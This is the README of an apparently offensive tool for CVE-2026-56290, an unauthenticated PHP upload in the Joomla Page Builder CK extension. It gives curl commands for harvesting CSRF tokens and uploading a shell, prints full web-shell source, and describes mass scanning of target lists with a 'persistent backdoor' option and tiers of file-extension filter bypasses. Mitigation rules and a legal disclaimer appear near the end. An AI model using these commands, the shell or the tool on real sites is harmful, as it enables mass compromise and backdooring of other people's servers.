- Vulnerability Overview
- Affected Versions
- Features
- Installation
- Usage
- Proof of Concept
- Technical Deep-Dive
- Detection Methodology
- Defense & Mitigation
- Disclaimer
- References
CVE-2026-56290 is a critical-severity vulnerability in Page Builder CK (com_pagebuilderck), a popular Joomla page builder extension. The browse.ajaxAddPicture controller method accepts unauthenticated file uploads with a user-controlled destination path, allowing attackers to write arbitrary PHP files to web-accessible directories.
// browse.php controller โ NO authentication check
function ajaxAddPicture() {
$input = JFactory::getApplication()->input;
$file = $input->files->get('file', null); // โ user-controlled file
$path = trim($input->get('path', '')); // โ user-controlled path, only trim()!
// ... uploads file to $path without validating the destination
}The path parameter undergoes only trim() sanitization โ no whitelist, no directory traversal check, no authentication gate. Combined with a CSRF token that is publicly accessible from any Joomla page, attackers can remotely upload PHP shells to any writable directory.
| Vector | Severity | Impact |
|---|---|---|
| Unauthenticated File Upload | 9.8 (Critical) | Arbitrary PHP code execution |
| CSRF Token Harvesting | 5.3 (Medium) | Enables the upload chain |
| Information Disclosure | 5.3 (Medium) | Extension version fingerprinting |
1. HIT Joomla homepage โ harvest CSRF token (hex32 + value "1")
2. POST file upload โ task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in โ media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL โ code executes, RCE confirmed
5. POST f=@file to shell โ upload additional tools
6. GET ?cleanup=1 โ shell self-destructs
| Page Builder CK Version | Status | Notes |
|---|---|---|
| 3.1.1 and below | ๐ด Vulnerable | Confirmed unauthenticated upload |
| 3.4.10 and below | ๐ด Vulnerable | Extended range per analysis |
| 3.5.10 and below | ๐ด Vulnerable | Some patched variants may exist |
| > 3.5.10 | ๐ข Possibly Patched | Verify via manifest XML |
Note: Version is detected from the Joomla manifest file at
/administrator/manifests/files/com_pagebuilderck.xml. If the manifest is inaccessible, the scanner defaults to treating the target as potentially vulnerable.
|
|
# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit
# Install dependencies
pip install -r requirements.txt
# Verify
python cve_2026_56290.py --helprequests>=2.28.0
urllib3>=1.26.0CVE-2026-56290 โ PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator
-t, --target Single target URL
-f, --file File with target URLs (one per line, # for comments)
-o, --output Live TXT output file (default: cve-2026-56290_live.txt)
--json JSON report file path (default: cve-2026-56290_report.json)
--threads Concurrent workers (default: 20)
--timeout Request timeout in seconds (default: 15)
--no-cleanup Leave shells on target (persistent backdoor)
-v, --verbose Verbose endpoint discovery output
--known-endpoint Skip discovery: task,file_param,folder_param
# Single target
python cve_2026_56290.py -t https://target.com
# Mass scan from file
python cve_2026_56290.py -f targets.txt
# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v
# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup
# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored
$ python cve_2026_56290.py -f targets.txt -o live_results.txtโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
Live TXT: live_results.txt
2026-07-04 15:30:00
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
https://target-vuln.com [rce_confirmed] 12.4s
PBCK: 3.4.7 [VULN]
RCE : ext=php | path=media/com_pagebuilderck/gfonts/
Shell: https://target-vuln.com/media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.php
Usage: POST f=@file | ?cleanup=1
EP : task=browse.ajaxAddPicture | file=file | folder=path
๐ก๏ธ https://target-patched.com [patched] 3.2s
โ
https://target-vuln2.com [rce_confirmed] 15.1s
PBCK: 3.1.0 [VULN]
RCE : ext=pHP | path=media/com_pagebuilderck/fonts/
Shell: https://target-vuln2.com/media/com_pagebuilderck/fonts/pbck_x7k2m4v9.pHP
Usage: POST f=@file | ?cleanup=1
EP : task=browse.ajaxAddPicture | file=file | folder=path
==================================================
SCAN SUMMARY
==================================================
Total : 5
โ
RCE Confirmed : 2
โ ๏ธ RCE Failed : 1
๐ก๏ธ Patched : 1
๐ Need Diff : 0
โ Not Joomla : 0
โญ๏ธ No Component : 1
๐ฅ Errors : 0
==================================================
Step 1 โ Harvest CSRF Token
curl -sk 'https://target.com/' | grep -oP 'name="[a-f0-9]{32}" value="1"'
# name="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6" value="1"Step 2 โ Upload PHP Shell
TOKEN="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6"
curl -sk \
-F "file=@shell.php;type=application/x-php" \
-F "path=media/com_pagebuilderck/gfonts/" \
"https://target.com/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&${TOKEN}=1"Step 3 โ Verify RCE
curl -sk 'https://target.com/media/com_pagebuilderck/gfonts/shell.php'
# โ PHP shell output, confirms code executionThe scanner deploys a self-contained uploader shell โ no exec(), system(), or eval() required:
<html><body>
<form method=post enctype=multipart/form-data>
<input type=file name=f>
<input type=submit value=Upload>
</form>
<pre><?php
if(isset($_FILES['f'])){
move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);
echo $_FILES['f']['name'].' OK';
}
if(isset($_GET['cleanup'])){
@unlink(__FILE__);
die('CLEANED');
}
echo '<unique-validation-token>';
?></pre></body></html>Shell capabilities:
- ๐ค Upload additional files via POST
f=@file - ๐งน Self-destruct via
?cleanup=1 - ๐ Token-based validation (scanner verifies the unique token in output)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ PBCK-EXPLOIT โ
โโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ RECON PHASE โ EXPLOIT PHASE โ
โ โ โ
โ โโโโโโโโโโโโโโ โ โโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โ
โ โ Joomla โ โ โ Endpoint โ โ Extension โ โ
โ โ Detection โ โ โ Brute-force โ โ Bypass Grid โ โ
โ โ (2-phase) โ โ โ (1000+ combo)โ โ (40+ exts) โ โ
โ โโโโโโโฌโโโโโโโ โ โโโโโโโโฌโโโโโโโโ โโโโโโโโฌโโโโโโโโ โ
โ โ โ โ โ โ
โ โโโโโโโผโโโโโโโ โ โโโโโโโโผโโโโโโโโ โโโโโโโโผโโโโโโโโ โ
โ โ PBCK โ โ โ CSRF Token โ โ PHP Shell โ โ
โ โ Detection โ โ โ Harvester โ โ Deployment โ โ
โ โ (probes) โ โ โ (5 pages) โ โ (20+ paths) โ โ
โ โโโโโโโฌโโโโโโโ โ โโโโโโโโฌโโโโโโโโ โโโโโโโโฌโโโโโโโโ โ
โ โ โ โ โ โ
โ โโโโโโโผโโโโโโโ โ โ โโโโโโโโผโโโโโโโโ โ
โ โ Version โ โ โ โ Validation โ โ
โ โ Check โ โ โ โ + Cleanup โ โ
โ โโโโโโโโโโโโโโ โ โ โโโโโโโโโโโโโโโโ โ
โโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
The scanner uses a tiered brute-force approach with a per-target time budget (15s):
| Tier | Tasks | File Params | Folder Params | Dest Paths | Total Combos |
|---|---|---|---|---|---|
| Tier 1 (confirmed) | browse.ajaxAddPicture + 3 others |
file, Filedata |
path, folder, dir |
Top 4 PBCK dirs | 96 |
| Tier 2 (full grid) | 12 tasks | 4 params | 5 params | 20+ paths | 4,800+ |
Each combo: upload a .txt probe โ verify via GET โ match on success. Returns immediately when confirmed.
CKFile::makeSafe() blocks .php on some configurations. The bypass strategy:
Tier 1: Fast
php, PHP, pht, phar
โ (if blocked)
Tier 2: Case juggling
Php, pHp, PhP, pHt, PHT, PhTmL, pHtml, ...
โ (if blocked)
Tier 3: Alternative handlers
php3, php4, php5, php6, php7, php8, phtml, shtml, inc
โ (if blocked)
Tier 4: Double extensions
php.jpg, jpg.php, php.png, php.gif, php.txt
โ (if blocked)
Tier 5: Windows tricks
php., PHP., php. , php.SWF
Joomla's CSRF token is embedded in every page โ home, login, registration, contact forms, admin:
CSRF_PAGES = [
"", # homepage
"/index.php?option=com_users&view=login", # login
"/index.php?option=com_users&view=registration", # registration
"/index.php?option=com_contact&view=contact&id=1", # contact
"/administrator/index.php", # admin login
]Pattern A โ HTML hidden input: <input type="hidden" name="<hex32>" value="1">
Pattern B โ JSON config: "csrf.token":"<hex32>"
Phase 1 โ HTML Fingerprints (fast, definitive)
- Generator meta tag containing "Joomla!"
- Structural elements:
<jdoc:include>,joomla-script-options,"csrf.token" - Path patterns:
/components/com_,/modules/mod_,/plugins/system/ - Session cookie analysis
Phase 2 โ Admin Panel Probe (fallback)
- Fetches
/administrator/page - Checks for Joomla-specific admin markers:
name="username",mod-login-,administrator/templates/
Tier 1 โ HTML strong indicators
com_pagebuilderck, /pagebuilderck/, /media/com_pagebuilderck
Tier 2 โ HTML weak indicators with confirmation
pagebuilderck + (pbck_ | pagebuilderck.css | pagebuilderck.js)
Tier 3 โ Direct file probes (catches installs where PBCK isn't on homepage)
/media/com_pagebuilderck/css/pagebuilderck.css
/media/com_pagebuilderck/js/pagebuilderck.js
/administrator/manifests/files/com_pagebuilderck.xml
# Update Page Builder CK to the latest patched version
# Check: https://extensions.joomla.org/extension/page-builder-ck/# Nginx โ block unauthenticated access to the upload controller
location ~* "option=com_pagebuilderck&task=browse.ajaxAddPicture" {
deny all;
}# Apache/.htaccess
RewriteCond %{QUERY_STRING} task=browse\.ajaxAddPicture [NC]
RewriteRule ^ - [F]# .htaccess in media/ โ disable PHP execution
<FilesMatch "\.php$">
Require all denied
</FilesMatch># Scan your own infrastructure
python cve_2026_56290.py -f my_joomla_sites.txt -o audit_results.txtThis software is provided solely for educational purposes and legitimate security research. It is intended to be used by:
- ๐ก๏ธ Security professionals conducting authorized penetration tests
- ๐ข Organizations auditing their own Joomla infrastructure
- ๐ฌ Researchers studying vulnerability exploitation techniques
- ๐ Students learning about web application security
- Access computer systems without explicit written authorization
- Compromise, damage, or disrupt systems you do not own
- Engage in illegal activity of any kind
Unauthorized access to computer systems violates laws including but not limited to:
- United States: Computer Fraud and Abuse Act (18 U.S.C. ยง 1030)
- Indonesia: UU ITE Pasal 30 & 46 (UU No. 11 Tahun 2008 jo. UU No. 1 Tahun 2024)
- European Union: Directive 2013/40/EU
- United Kingdom: Computer Misuse Act 1990
The author(s) assume NO LIABILITY for any misuse, damage, or legal consequences resulting from the use of this tool. By using this software, you acknowledge that you are solely responsible for your actions and agree to comply with all applicable laws.
| Resource | Link |
|---|---|
| NVD Entry | CVE-2026-56290 |
| Joomla Security | developer.joomla.org/security |
| Page Builder CK | extensions.joomla.org |
| OWASP File Upload | Unrestricted File Upload |
โก Built with precision for the security research community โก
Joomlaยฎ is a registered trademark of Open Source Matters, Inc.
This project is not affiliated with or endorsed by Joomla, Open Source Matters, or Page Builder CK.